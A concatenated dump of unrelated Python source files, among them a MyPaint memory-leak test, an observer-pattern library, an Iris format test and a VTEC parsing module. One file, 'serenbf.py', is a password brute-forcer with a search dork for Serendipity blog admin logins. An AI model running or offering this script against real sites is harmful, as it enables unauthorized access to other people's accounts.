print(("gold: " + str(stimseq.StimSeq.fromString("../../stimulus/gold_10hz.txt"))))
print(("interval:" + str(stimseq.StimSeq.mkStimSeqInterval(2,4,.15,[3*.15,4*.15]))))
print(("Scan(psk): " + str(stimseq.StimSeq.mkStimSeqScan(4,3,.1).phaseShiftKey())))
| jadref/buffer_bci | python/signalProc/stimseq.py | Python | gpl-3.0 | 8,316 |
#!/usr/bin/env python
import numpy
from time import time
import sys
import os
import gc
os.chdir(os.path.dirname(sys.argv[0]))
sys.path.insert(0, '..')
from lib import mypaintlib, tiledsurface, brush, document, command, helpers
import guicontrol
# loadtxt is known to leak memory, thus we run it only once
# http://projects.scipy.org/numpy/ticket/1356
painting30sec_events = numpy.loadtxt('painting30sec.dat')
LEAK_EXIT_CODE = 33
def mem():
gc.collect()
return int(open('/proc/self/statm').read().split()[0])
def check_garbage(msg='uncollectable garbage left over from previous tests'):
gc.collect()
garbage = []
for obj in gc.garbage:
# ignore garbage generated by numpy loadtxt command
if hasattr(obj, 'filename') and obj.filename == 'painting30sec.dat':
continue
garbage.append(obj)
assert not garbage, 'uncollectable garbage left over from previous tests: %s' % garbage
def iterations():
check_garbage()
max_mem = 0
max_mem_stable = 0
max_mem_increasing = 0
leak = True
m1 = 0
for i in range(options.max_iterations):
yield i
if options.debug:
if i == 3:
check_garbage()
helpers.record_memory_leak_status()
if i == 4 or i == 5:
helpers.record_memory_leak_status(print_diff=True)
m2 = mem()
print 'iteration %02d/%02d: %d pages used (%+d)' % (i+1, options.max_iterations, m2, m2-m1)
m1 = m2
if m2 > max_mem:
max_mem = m2
max_mem_stable = 0
max_mem_increasing += 1
if max_mem_increasing == options.required:
print 'maximum was always increasing for', max_mem_increasing, 'iterations'
break
else:
max_mem_stable += 1
max_mem_increasing = 0
if max_mem_stable == options.required:
print 'maximum was stable for', max_mem_stable, 'iterations'
leak = False
break
check_garbage()
if leak:
print 'memory leak found'
sys.exit(LEAK_EXIT_CODE)
else:
print 'no leak found'
all_tests = {}
def leaktest(f):
"decorator to declare leak test functions"
all_tests[f.__name__] = f
return f
#@leaktest
def provoke_leak():
for i in iterations():
# note: interestingly this leaky only shows in the later iterations
# (and very small leaks might not be detected)
setattr(gc, 'my_test_leak_%d' % i, numpy.zeros(50000))
@leaktest
def noleak():
for i in iterations():
setattr(gc, 'my_test_leak', numpy.zeros(50000))
@leaktest
def document_alloc():
for i in iterations():
doc = document.Document()
doc.cleanup()
@leaktest
def surface_alloc():
for i in iterations():
tiledsurface.Surface()
def paint_doc(doc):
events = painting30sec_events
t_old = events[0][0]
layer = doc.layer_stack.current
for i, (t, x, y, pressure) in enumerate(events):
dtime = t - t_old
t_old = t
layer.stroke_to(doc.brush, x, y, pressure, 0.0, 0.0, dtime)
@leaktest
def save_test():
doc = document.Document()
paint_doc(doc)
for i in iterations():
doc.save('test_leak.ora')
doc.save('test_leak.png')
doc.save('test_leak.jpg')
doc.cleanup()
@leaktest
def repeated_loading():
doc = document.Document()
for i in iterations():
doc.load('bigimage.ora')
doc.cleanup()
@leaktest
def paint_save_clear():
doc = document.Document()
for i in iterations():
paint_doc(doc)
doc.save('test_leak.ora')
doc.clear()
doc.cleanup()
def paint_gui(gui):
"""
Paint with a constant number of frames per recorded second.
Not entirely realistic, but gives good and stable measurements.
"""
FPS = 30
gui_doc = gui.app.doc
model = gui_doc.model
tdw = gui_doc.tdw
b = gui.app.brushmanager.get_brush_by_name('redbrush')
gui.app.brushmanager.select_brush(b)
events = list(painting30sec_events)
t_old = 0.0
t_last_redraw = 0.0
for t, x, y, pressure in events:
if t > t_last_redraw + 1.0/FPS:
gui.wait_for_gui()
t_last_redraw = t
dtime = t - t_old
t_old = t
x, y = tdw.display_to_model(x, y)
gui_doc.modes.top.stroke_to(model, dtime, x, y, pressure, 0.0, 0.0)
@leaktest
def gui_test():
# NOTE: this an all-in-one GUI test as a workaround for the
# problem that the GUI does not cleanly terminate after the test fork()
gui = guicontrol.GUI()
gui.wait_for_idle()
gui.app.filehandler.open_file(u'bigimage.ora')
gui_doc = gui.app.doc
for i in iterations():
gui.app.filehandler.open_file(u'smallimage.ora')
gui.wait_for_idle()
paint_gui(gui)
gui.app.filehandler.save_file(u'test_save.ora')
gui.scroll()
gui_doc.zoom(gui_doc.ZOOM_OUTWARDS)
gui.scroll()
gui_doc.zoom(gui_doc.ZOOM_INWARDS)
if __name__ == '__main__':
import logging
logging.basicConfig(level=logging.INFO)
from optparse import OptionParser
parser = OptionParser('usage: %prog [options] [test1 test2 test3 ...]')
parser.add_option(
'-a',
'--all',
action='store_true',
default=False,
help='run all tests'
)
parser.add_option(
'-l',
'--list',
action='store_true',
default=False,
help='list all available tests'
)
parser.add_option(
'-d',
'--debug',
action='store_true',
default=False,
help='print leak analysis (slow)'
)
parser.add_option(
'-e',
'--exit',
action='store_true',
default=False,
help='exit at first error'
)
parser.add_option(
'-r',
'--required',
type='int',
default=15,
help='iterations required to draw a conclusion (default: 15)'
)
parser.add_option(
'-m',
'--max-iterations',
type='int',
default=100,
help='maximum number of iterations (default: 100)'
)
options, tests = parser.parse_args()
if options.list:
for name in sorted(all_tests.keys()):
print name
sys.exit(0)
if options.required >= options.max_iterations:
print 'requiring more good iterations than the iteration limit makes no sense'
sys.exit(1)
if not tests:
if options.all:
tests = list(all_tests)
else:
parser.print_help()
sys.exit(1)
for t in tests:
if t not in all_tests:
print 'Unknown test:', t
sys.exit(1)
results = []
for t in tests:
child_pid = os.fork()
if not child_pid:
print '---'
print 'running test "%s"' % t
print '---'
all_tests[t]()
sys.exit(0)
pid, status = os.wait()
exitcode = os.WEXITSTATUS(status)
if options.exit and exitcode != 0:
sys.exit(1)
results.append(exitcode)
everything_okay = True
print
print '=== SUMMARY ==='
for t, exitcode in zip(tests, results):
if exitcode == 0:
print t, 'OK'
else:
everything_okay = False
if exitcode == LEAK_EXIT_CODE:
print t, 'LEAKING'
else:
print t, 'EXCEPTION'
if not everything_okay:
sys.exit(1)
| dothiko/mypaint | tests/test_memory_leak.py | Python | gpl-2.0 | 7,613 |
"""
This module implements the observer design pattern.
It provides two decorators:
observable_function
observable_method
which you use to make functions and methods observable by other functions and
methods. For example:
@observable_function
def observed_func(x):
print("observed_func called with arg %s"%(x,))
def observing_func(x):
print("observing_func called with arg %s"%(x,))
observed_func.add_observer(observing_func)
observed_func('banana')
>>> observed_func called with arg banana
>>> observing_func called with arg banana
When registering observers, if the optional argument identify_observed is set
to True, then when the observers are called, the observed object will be
passed as the first argument:
def observing_func2(obj, x):
print("observing_func2 called with arg %s"%(x,))
print("I was called by %s"%(obj.__name__,))
observed_func.add_observer(observing_func2, identify_observed=True)
observed_func('banana')
>>> observed_func called with arg banana
>>> observing_func called with arg banana
>>> observing_func2 called with arg banana
>>> I was called by observed_func
Methods can be observed as well:
class Foo:
@observable_method()
def bar(self, x):
print("bar called with argument %s"%(x,))
f = Foo()
f.bar.add_observer(observing_func)
f.bar('banana')
>>> bar called with argument banana
>>> observing_func called with argument banana
Any function or bound method can be made registered as an observer, and any
function or method decorated with observable_function or observable_method
can be observed. Decorated functions and methods can be observers too.
Unregister observers like this:
observed_func.discard_observer(observing_func)
observed_func.discard_observer(observing_func2)
observed_func('banana')
>>> observed_func called with arg banana
For more information, see the docstrings for observable_function and
observable_method. If you're a developer trying to understand how the code
works, I recommend starting with ObservableFunction, and then ObserverFunction
and ObserverBoundMethod.
"""
import weakref
import functools
__version__ = "0.5.3"
INSTANCE_OBSERVER_ATTR = "_observed__observers"
class ObserverFunction:
"""Wraps a function which is registered as an observer.
I use a weak reference to the observing function so that being an observer
does not prevent garbage collection of the observing function.
"""
def __init__(self, func, identify_observed, weakref_info):
"""Initialize an ObserverFunction.
Args:
func: function I wrap. I call this function when I am called.
identify_observed: boolean indicating whether or not I will pass
the observed object as the first argument to the function I
wrap. True means pass the observed object, False means do not
pass the observed objec.
weakref_info: Tuple of (key, dict) where dict is the dictionary
which is keeping track of my role as an observer and key is
the key in that dict which maps to me. When the function I wrap
is finalized, I use this information to delete myself from the
dictionary.
"""
# For some reason, if we put the update_wrapper after we make the
# weak reference to func, the call to weakref.ref returns a function
# instead of a weak ref. So, don't move the next line chomp, chomp...
functools.update_wrapper(self, func)
self.identify_observed = identify_observed
key, d = weakref_info
self.func_wr = weakref.ref(func, CleanupHandler(key, d))
def __call__(self, observed_obj, *arg, **kw):
"""Call the function I wrap.
Args:
*arg: The arguments passed to me by the observed object.
**kw: The keyword args passed to me by the observed object.
observed_obj: The observed object which called me.
Returns:
Whatever the function I wrap returns.
"""
if self.identify_observed:
return self.func_wr()(observed_obj, *arg, **kw)
else:
return self.func_wr()(*arg, **kw)
class ObserverBoundMethod:
"""I wrap a bound method which is registered as an observer.
I use a weak reference to the observing bound method's instance so that
being an observer does not prevent garbage collection of that instance.
"""
def __init__(self, inst, method_name, identify_observed, weakref_info):
"""Initialize an ObserverBoundMethod.
Args:
inst: the object to which the bound method I wrap is bound.
method_name: the name of the method I wrap.
identify_observed: boolean indicating whether or not I will pass
the observed object as the first argument to the function I
wrap. True means pass the observed object, False means do not
pass the observed objec.
weakref_info: Tuple of (key, dict) where dict is the dictionary
which is keeping track of my role as an observer and key is
the key in that dict which maps to me. When the function I wrap
is finalized, I use this information to delete myself from the
dictionary.
"""
self.identify_observed = identify_observed
key, d = weakref_info
self.inst = weakref.ref(inst, CleanupHandler(key, d))
self.method_name = method_name
def __call__(self, observed_obj, *arg, **kw):
"""Call the function I wrap.
Args:
*arg: The arguments passed to me by the observed object.
**kw: The keyword args passed to me by the observed object.
observed_obj: The observed object which called me.
Returns:
Whatever the function I wrap returns.
"""
bound_method = getattr(self.inst(), self.method_name)
if self.identify_observed:
return bound_method(observed_obj, *arg, **kw)
else:
return bound_method(*arg, **kw)
class ObservableFunction:
"""A function which can be observed.
I wrap a function and allow other callables to register as observers of it.
If you have a function func, then ObservableFunction(func) is a wrapper
around func which can accept observers.
Add and remove observers using:
add_observer(observer)
registers observer to be called whenever I am called
discard_observer(observer)
Removes an observer from the set of observers.
Attributes:
func: The function I wrap.
observers: Dict mapping keys unique to each observer to that observer.
If this sounds like a job better served by a set, you're probably
right and making that change is planned. It's delicate because it
requires making sure the observer objects are hashable and have a
proper notion of equality.
"""
def __init__(self, func):
"""Initialize an ObservableFunction.
Args:
func: The function I wrap.
"""
functools.update_wrapper(self, func)
self.func = func
self.observers = {} # observer key -> observer
def add_observer(self, observer, identify_observed=False):
"""Register an observer to observe me.
Args:
observer: The callable to register as an observer.
identify_observed: If True, then the observer will get myself
passed as an additional first argument whenever it is invoked.
See ObserverFunction and ObserverBoundMethod to see how this
works.
Returns:
True if the observer was added, False otherwise.
The observing function or method will be called whenever I am called,
and with the same arguments and keyword arguments.
If a bound method or function has already been registered as an
observer, trying to add it again does nothing. In other words, there is
no way to sign up an observer to be called back multiple times. This
was a conscious design choice which users are invited to complain about
if there is a compelling use case where this is inconvenient.
"""
# If the observer is a bound method,
if hasattr(observer, "__self__"):
result = self._add_bound_method(observer, identify_observed)
# Otherwise, assume observer is a normal function.
else:
result = self._add_function(observer, identify_observed)
return result
def _add_function(self, func, identify_observed):
"""Add a function as an observer.
Args:
func: The function to register as an observer.
identify_observed: See docstring for add_observer.
Returns:
True if the function is added, otherwise False.
"""
key = self.make_key(func)
if key not in self.observers:
self.observers[key] = ObserverFunction(
func, identify_observed, (key, self.observers))
return True
else:
return False
def _add_bound_method(self, bound_method, identify_observed):
"""Add an bound method as an observer.
Args:
bound_method: The bound method to add as an observer.
identify_observed: See the docstring for add_observer.
Returns:
True if the bound method is added, otherwise False.
"""
inst = bound_method.__self__
method_name = bound_method.__name__
key = self.make_key(bound_method)
if key not in self.observers:
self.observers[key] = ObserverBoundMethod(
inst, method_name, identify_observed, (key, self.observers))
return True
else:
return False
def discard_observer(self, observer):
"""Un-register an observer.
Args:
observer: The observer to un-register.
Returns true if an observer was removed, otherwise False.
"""
discarded = False
key = self.make_key(observer)
if key in self.observers:
del self.observers[key]
discarded = True
return discarded
@staticmethod
def make_key(observer):
"""Construct a unique, hashable, immutable key for an observer."""
if hasattr(observer, "__self__"):
inst = observer.__self__
method_name = observer.__name__
key = (id(inst), method_name)
else:
key = id(observer)
return key
def __call__(self, *arg, **kw):
"""Invoke the callable which I proxy, and all of my observers.
The observers are called with the same *args and **kw as the main
callable.
Args:
*arg: The arguments you want to pass to the callable which I wrap.
**kw: The keyword args you want to pass to the callable I wrap.
Returns:
Whatever the wrapped callable returns.
Note:
I think it is possible for observers to disappear while we execute
them. It might be better to make strong references to all
observers before we start callback execution, since we don't keep
strong references elsewhere.
"""
result = self.func(*arg, **kw)
for key in self.observers:
self.observers[key](self, *arg, **kw)
return result
class ObservableBoundMethod(ObservableFunction):
"""I wrap a bound method and allow observers to be registered."""
def __init__(self, func, inst, observers):
"""Initialize an ObservableBoundMethod.
Args:
func: The function (i.e. unbound method) I wrap.
inst: The instance to which I am bound.
observers: Dict mapping keys unique to each observer to that
observer. This dict comes from the descriptor which generates
this ObservableBoundMethod instance. In this way, multiple
instances of ObservableBoundMethod with the same underlying
object instance and method all add, remove, and call observers
from the same collection.
If you think this dict should probably be a set instead then
you probably grok this module.
"""
self.func = func
functools.update_wrapper(self, func)
self.inst = inst
self.observers = observers
def __call__(self, *arg, **kw):
"""Invoke the bound method I wrap, and all of my observers.
The observers are called with the same *args and **kw as the bound
method I wrap.
Args:
*arg: The arguments you want to pass to the callable which I wrap.
**kw: The keyword args you want to pass to the callable I wrap.
Returns:
Whatever the wrapped bound method returns.
Note:
I think it is possible for observers to disappear while we execute
them. It might be better to make strong references to all
observers before we start callback execution, since we don't keep
strong references elsewhere.
"""
result = self.func(self.inst, *arg, **kw)
for key in self.observers:
self.observers[key](self, *arg, **kw)
return result
def __eq__(self, other):
"""Check equality of this bound method with another."""
return all((
self.inst == other.inst,
self.func == other.func))
@property
def __self__(self):
"""The instance to which I'm bound."""
return self.inst
"""
The following two classes are descriptors which manage access to observable
methods. Suppose we have a class Foo with method bar, and suppose we have an
instance foo of Foo. When Python sees foo.bar it creates and returns a bound
method. Regular bound methods don't support registering observers. Therefore,
we use descriptors to intercept the .bar access. The descriptor creates a
wrapper around the usual bound method. This wrapper can accept observers.
Now, how do we keep track of registered observers? We can't just store them as
attributes of the ObservableBoundMethod because the ObservableBoundMethod
doesn't necessarily live very long. If we do
foo.bar.add_observer(some_observer)
and then later call
foo.bar(...)
the ObservableBoundMethod active in those two cases are not the same object.
Therefore, we must persist the observers somewhere else. An obvious option is
to store the observers as an attribute of foo. This strategy is implemented in
ObservableMethodManager_PersistOnInstances. The other strategy is to persist the
observers within the descriptor itself. In this strategy, the descriptor holds
a mapping from instance id's to mappings from methods to observers. This
strategy is implemented in ObservableMethodManager_PersistOnDescriptor.
"""
class ObservableMethodManager_PersistOnInstances:
"""I manage access to observable methods.
When accessed through an instance I return an ObservableBoundMethod.
When accessed through a class I return an ObservableUnboundMethod.
When an instance accesses me, I create an ObservableBoundMethod for that
instance and return it.
"""
def __init__(self, func):
"""Initialize an ObservableMethodManager_PersistOnInstances.
Args:
func: the function (i.e.unbound method) I manage.
"""
self._func = func
self._unbound_method = ObservableUnboundMethod(self)
def __get__(self, inst, cls):
"""Return an ObservableBoundMethod or ObservableUnboundMethod.
If accessed by instance, I return an ObservableBoundMethod which
handles that instance. If accessed by class I return an
ObservableUnboundMethod.
Args:
inst: The instance through which I was accessed. This will be None
if I was accessed through the class, i.e. as an unbound method.
cls: The class through which I was accessed.
"""
if inst is None:
return self._unbound_method
else:
if not hasattr(inst, INSTANCE_OBSERVER_ATTR):
d = {}
setattr(inst, INSTANCE_OBSERVER_ATTR, d)
else:
d = getattr(inst, INSTANCE_OBSERVER_ATTR)
observers = d.setdefault(self._func.__name__, {})
return ObservableBoundMethod(self._func, inst, observers)
def __set__(self, inst, val):
"""Disallow setting because we don't guarantee behavior."""
raise RuntimeError("Assignment not supported")
class ObservableMethodManager_PersistOnDescriptor:
"""Manage access to observable methods.
When accessed through an instance I return an ObservableBoundMethod.
When accessed through a class I return an ObservableUnboundMethod.
Instead of storing observers as attributes on the instances whose bound
method is being observed, I store them here.
I store no strong references to the instances I manage. This guarantees
that I don't prevent garbage collection of those instances.
When an instance accesses me, I create an ObservableBoundMethod for that
instance and return it. Observers added to that ObservableBoundMethod, are
persisted by me, not as attributes of the instances.
"""
# We persist the observers here because if we try to persist them inside
# the ObservableBoundMethods then we have to persist the
# ObservableBoundMethods. That would be bad, because then the reference to
# the inst inside the ObservableBoundMethod would be persisted and would
# prevent garbage collection of the inst. We can't use a weak ref to fix
# this because the ObservableBoundMethod _should_ prevent garbage
# collection of the inst as long as the ObservableBoundMethod is alive. If
# this doesn't make sense draw a picture of what references what and it
# will become clear.
# The other option is to persist the observers as attributes of the
# instances themselves, which is done by
# ObservableMethodManager_PersistOnInstances.
def __init__(self, func):
"""Initialize an ObservableMethodManager_PersistOnDescriptor.
func is the function I will give to the ObservableBoundMethods I create.
"""
self._func = func
self._unbound_method = ObservableUnboundMethod(self)
# instance id -> (inst weak ref, observers)
self.instances = {}
def __get__(self, inst, cls):
"""Return an ObservableBoundMethod or ObservableUnboundMethod.
If accessed by instance I return an ObservableBoundMethod which handles
that instance.
If accessed by class I return an ObservableUnboundMethod.
"""
if inst is None:
return self._unbound_method
# Only weak references to instances are stored. This guarantees that
# the descriptor cannot prevent the instances it manages from being
# garbage collected.
# We can't use a WeakKeyDict because not all instances are hashable.
# Instead we use the instance's id as a key which maps to a tuple of a
# weak ref to the instance, and the observers for that instance. The
# weak ref has an expiration callback set up to clear the dict entry
# when the instance is finalized.
inst_id = id(inst)
if inst_id in self.instances:
wr, observers = self.instances[inst_id]
if wr() is None:
msg = "Unreachable: instance id=%d not cleaned up"%(inst_id,)
raise RuntimeError(msg)
else:
wr = weakref.ref(inst, CleanupHandler(inst_id, self.instances))
observers = {}
self.instances[inst_id] = (wr, observers)
return ObservableBoundMethod(self._func, inst, observers)
def __set__(self, inst, val):
"""Disallow setting because we don't guarantee behavior."""
raise RuntimeError("Assignment not supported")
class ObservableUnboundMethod:
"""Wrapper for an unbound version of an observable method."""
def __init__(self, manager):
""" Create an ObservableUnboundMethod.
Args:
manager: the descriptor in charge of this method. See
ObservableMethodManager.
"""
self._manager = manager
functools.update_wrapper(self, manager._func)
def __call__(self, obj, *arg, **kw):
""" Call the unbound method.
We essentially build a bound method and call that. This ensures that
the code for managing observers is invoked in the same was as it would
be for a bound method.
"""
bound_method = self._manager.__get__(obj, obj.__class__)
return bound_method(*arg, **kw)
class CleanupHandler:
"""Manage removal of weak references from their storage points.
Use me as a weakref.ref callback to remove an object's id from a dict when
that object is garbage collected.
"""
def __init__(self, key, d):
""" Initialize a cleanup handler.
Args:
key: the key we will delete.
d: the dict from which we will delete it.
"""
self.key = key
self.d = d
def __call__(self, wr):
"""Remove an entry from the dict.
When a weak ref's object expires, the CleanupHandler is called, which
invokes this method.
Args:
wr: The weak reference being finalized.
"""
if self.key in self.d:
del self.d[self.key]
def observable_function(func):
"""Decorate a function to make it observable.
Use me as a decorator on a function, like this:
@observable_function
def my_func(x):
print("my_func called with arg: %s"%(x,))
def callback(x):
print("callback called with arg: %s"%(x,))
class Foo:
def bar(self, x):
print("Foo object's .bar called with arg: %s"%(x,))
foo = Foo()
my_func.add_observer(callback)
my_func.add_observer(foo.bar)
my_func('banana')
>>> my_func called with arg: banana
>>> callback called with arg: banana
>>> Foo object's .bar called with arg: banana
Unregister observers like this:
my_func.discard_observer(callback)
"""
return ObservableFunction(func)
def get_observable_method(func, strategy):
"""Decorate a method to make it observable.
You can use me as a decorator on a method, like this:
class Foo:
__init__(self, name):
self.name = name
@observable_method
def bar(self, x):
print("%s called bar with arg: %s"%(self.name, x))
Now other functions and methods can sign up to get notified when my_func is
called:
def observer(x):
print("observer called with arg: %s"%(x,))
a = Foo('a')
b = Foo('b')
a.bar.add_observer(observer)
a.bar.add_observer(b.bar)
a.bar('banana')
>>> a called bar with arg: banana
>>> b called bar with arg: banana
>>> observer called with arg: banana
Note that bar can be an observer as well as observed.
Unregister observers like this:
a.bar.discard_observer(observer)
Args:
func: The function (i.e. method) to be made observable.
strategy: When observers are registered to a bound method, we need to
store those observers so that we can call them when the observed
method is called. There are two ways to do this as explained below.
In any case, access to the observable method is managed by a
descriptor, and we select which strategy we use for storing observers
by selecting one of two descriptors. The strategy argument selects
the descriptor.
The first strategy is to give each instance of the class containing
the decorated method an attribute whose value is a mapping from
observable method to the functions observing that method. This is
the default strategy and is implemented in
ObservableMethodManager_PersistOnInstances.
The advantages of this strategy are that the code is very simple
and pickling the observers along with the instance owning the
observable methods is easier.
The other strategy is to persist the observers for each instance
inside the descriptor which manages access to that method. This
strategy is implemented in
ObservableMethodManager_PersistOnDescriptor.
The advantage of this strategy is that it doesn't paste any data
onto the instances which have observable methods.
For the simpler strategy in which we store the observers in the
instances, just use me as a decorator. If you want the alternate
strategy in which the observers are stored in the descriptor,
call me explicitly on the function (unbound method) you want to
make observable and set strategy='descriptor'.
"""
if strategy == 'instances':
return ObservableMethodManager_PersistOnInstances(func)
elif strategy == 'descriptor':
return ObservableMethodManager_PersistOnDescriptor(func)
else:
raise ValueError(f"Strategy {strategy} not recognized")
def observable_method(strategy='instances'):
return lambda func: get_observable_method(func, strategy=strategy)
| DanielSank/observed | observed.py | Python | mit | 25,883 |
#!/usr/bin/env python
import numpy as np
import cv2
from matplotlib import pyplot as plt
img = cv2.imread('fruits.jpg', 1)
cv2.imshow('image', img)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
blur = cv2.GaussianBlur(img, (75, 1), 0)
cv2.namedWindow('blur', cv2.WINDOW_NORMAL)
cv2.imshow('blur', blur)
cv2.waitKey(0)
cv2.destroyAllWindows()
# http://stackoverflow.com/a/15074748/1134940
# img = img[:,:,::-1]
# plt.imshow(img, interpolation = 'bicubic')
# plt.xticks([]), plt.yticks([])
# plt.show()
| ultranaut/fuzzy | still.py | Python | mit | 505 |
# (C) British Crown Copyright 2013 - 2015, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""Integration tests for NAME to GRIB2 interoperability."""
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
# Import iris.tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
import numpy as np
import iris
import iris.unit
def name_cb(cube, field, filename):
# NAME files give the time point at the end of the range but Iris'
# GRIB loader creates it in the middle (the GRIB file itself doesn't
# encode a time point). Here we make them consistent so we can
# easily compare them.
t_coord = cube.coord('time')
t_coord.points = t_coord.bounds[0][1]
fp_coord = cube.coord('forecast_period')
fp_coord.points = fp_coord.bounds[0][1]
# NAME contains extra vertical meta-data.
z_coord = cube.coords('height')
if z_coord:
z_coord[0].long_name = 'height above ground level'
z_coord = cube.coords('altitude')
if z_coord:
z_coord[0].long_name = 'altitude above sea level'
class TestNameToGRIB(tests.IrisTest):
def check_common(self, name_cube, grib_cube):
self.assertTrue(np.allclose(name_cube.data, name_cube.data))
self.assertTrue(
np.allclose(name_cube.coord('latitude').points,
grib_cube.coord('latitude').points))
self.assertTrue(
np.allclose(name_cube.coord('longitude').points,
grib_cube.coord('longitude').points - 360))
for c in ['height', 'time']:
if name_cube.coords(c):
self.assertEqual(name_cube.coord(c),
grib_cube.coord(c))
@tests.skip_data
def test_name2_field(self):
filepath = tests.get_data_path(('NAME', 'NAMEII_field.txt'))
name_cubes = iris.load(filepath)
for i, name_cube in enumerate(name_cubes):
with self.temp_filename('.grib2') as temp_filename:
iris.save(name_cube, temp_filename)
grib_cube = iris.load_cube(temp_filename, callback=name_cb)
self.check_common(name_cube, grib_cube)
self.assertCML(
grib_cube, tests.get_result_path(
('integration', 'name_grib', 'NAMEII',
'{}_{}.cml'.format(i, name_cube.name()))))
@tests.skip_data
def test_name3_field(self):
filepath = tests.get_data_path(('NAME', 'NAMEIII_field.txt'))
name_cubes = iris.load(filepath)
for i, name_cube in enumerate(name_cubes):
with self.temp_filename('.grib2') as temp_filename:
iris.save(name_cube, temp_filename)
grib_cube = iris.load_cube(temp_filename, callback=name_cb)
self.check_common(name_cube, grib_cube)
self.assertCML(
grib_cube, tests.get_result_path(
('integration', 'name_grib', 'NAMEIII',
'{}_{}.cml'.format(i, name_cube.name()))))
if __name__ == "__main__":
tests.main()
| decvalts/iris | lib/iris/tests/integration/format_interop/test_name_grib.py | Python | gpl-3.0 | 3,844 |
#!/usr/bin/python
#Serendipity Brute Force (serendipity_admin.php) POC
#Dork: "Powered by Serendipity" inurl:serendipity_admin.php
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib
print "\n d3hydr8[at]gmail[dot]com SerenBF v1.0"
print "----------------------------------------------"
if len(sys.argv) != 4:
print "Usage: ./serenbf.py <site> <user> <wordlist>\n"
sys.exit(1)
if sys.argv[1][:7] != "http://":
host = "http://"+sys.argv[1]
else:
host = sys.argv[1]
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]
try:
words = open(sys.argv[3], "r").readlines()
print "[+] Words Loaded",len(words),"\n"
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
login_form_seq = [
('serendipity[action]', 'admin'),
('serendipity[user]', sys.argv[2]),
('serendipity[pass]', word[:-1]),
('serendipity[auto]', 'on'),
('submit', 'Login >')]
login_form_data = urllib.urlencode(login_form_seq)
try:
req = urllib2.Request(url=host, data=login_form_data)
site = urllib2.urlopen(req).read()
except(urllib2.URLError):
site = ""
pass
#Change this response if different. (language)
if re.search("invalid username or password",site):
print "[-] Login Failed:",word[:-1]
else:
print "\n\t[!] Login Successfull:",sys.argv[2],word
sys.exit(1)
print "\n[-] Brute Complete\n"
| knightmare2600/d4rkc0de | bruteforce/serenbf.py | Python | gpl-2.0 | 1,418 |
"""Support NWS VTEC encoding"""
import re
from datetime import timezone, timedelta, datetime
from pyiem.util import LOG
VTEC_RE = (
r"(/([A-Z])\.([A-Z]+)\.([A-Z]+)\.([A-Z]+)\.([A-Z])\."
r"([0-9]+)\.([0-9TZ]+)-([0-9TZ]+)/)"
)
VTEC_CLASS = {
"O": "Operational",
"T": "Test",
"E": "Experimental",
"X": "Experimental VTEC",
}
VTEC_ACTION = {
"NEW": "issues",
"CON": "continues",
"EXA": "expands area to include",
"EXT": "extends time of",
"EXB": "extends time and expands area to include",
"UPG": "issues upgrade to",
"CAN": "cancels",
"EXP": "expires",
"ROU": "routine",
"COR": "corrects",
}
VTEC_SIGNIFICANCE = {
"W": "Warning",
"Y": "Advisory",
"A": "Watch",
"S": "Statement",
"O": "Outlook",
"N": "Synopsis",
"F": "Forecast",
}
# https://www.nws.noaa.gov/directives/sym/pd01017003curr.pdf
VTEC_PHENOMENA = {
"AF": "Ashfall",
"AS": "Air Stagnation",
"BH": "Beach Hazard",
"BS": "Blowing Snow",
"BW": "Brisk Wind",
"BZ": "Blizzard",
"CF": "Coastal Flood",
"DF": "Debris Flow",
"DS": "Dust Storm",
"DU": "Blowing Dust",
"EC": "Extreme Cold",
"EH": "Excessive Heat",
"EW": "Extreme Wind",
"FA": "Flood",
"FF": "Flash Flood",
"FG": "Dense Fog",
"FL": "Flood",
"FR": "Frost",
"FW": "Red Flag",
"FZ": "Freeze",
"GL": "Gale",
"HF": "Hurricane Force Wind",
"HI": "Inland Hurricane",
"HS": "Heavy Snow",
"HT": "Heat",
"HU": "Hurricane",
"HW": "High Wind",
"HY": "Hydrologic",
"HZ": "Hard Freeze",
"IP": "Sleet",
"IS": "Ice Storm",
"LB": "Lake Effect Snow and Blowing Snow",
"LE": "Lake Effect Snow",
"LO": "Low Water",
"LS": "Lakeshore Flood",
"LW": "Lake Wind",
"MA": "Marine",
"MF": "Marine Dense Fog",
"MH": "Marine Ashfall",
"MS": "Marine Dense Smoke",
"RB": "Small Craft for Rough",
"RP": "Rip Currents",
"SB": "Snow and Blowing",
"SC": "Small Craft",
"SE": "Hazardous Seas",
"SI": "Small Craft for Winds",
"SM": "Dense Smoke",
"SN": "Snow",
"SQ": "Snow Squall",
"SR": "Storm",
"SS": "Storm Surge",
"SU": "High Surf",
"SV": "Severe Thunderstorm",
"SW": "Small Craft for Hazardous Seas",
"TI": "Inland Tropical Storm",
"TO": "Tornado",
"TR": "Tropical Storm",
"TS": "Tsunami",
"TY": "Typhoon",
"UP": "Ice Accretion",
"WC": "Wind Chill",
"WI": "Wind",
"WS": "Winter Storm",
"WW": "Winter Weather",
"ZF": "Freezing Fog",
"ZR": "Freezing Rain",
"ZY": "Freezing Spray",
}
# Taken from http://www.weather.gov/help-map
# Not all of these are an exact match.
NWS_COLORS = {
"AF.W": "#A9A9A9",
"AF.Y": "#696969",
"AS.Y": "#808080",
"BH.S": "#40E0D0",
"BW.Y": "#D8BFD8",
"BZ.A": "#ADFF2F",
"BZ.W": "#FF4500",
"CF.A": "#66CDAA",
"CF.S": "#6B8E23",
"CF.W": "#228B22",
"CF.Y": "#7CFC00",
"DS.W": "#FFE4C4",
"DS.Y": "#BDB76B",
"DU.W": "#FFE4C4",
"DU.Y": "#BDB76B",
"EC.A": "#0000FF",
"EC.W": "#0000FF",
"EH.A": "#800000",
"EH.W": "#C71585",
"EH.Y": "#800000",
"EW.W": "#FF8C00",
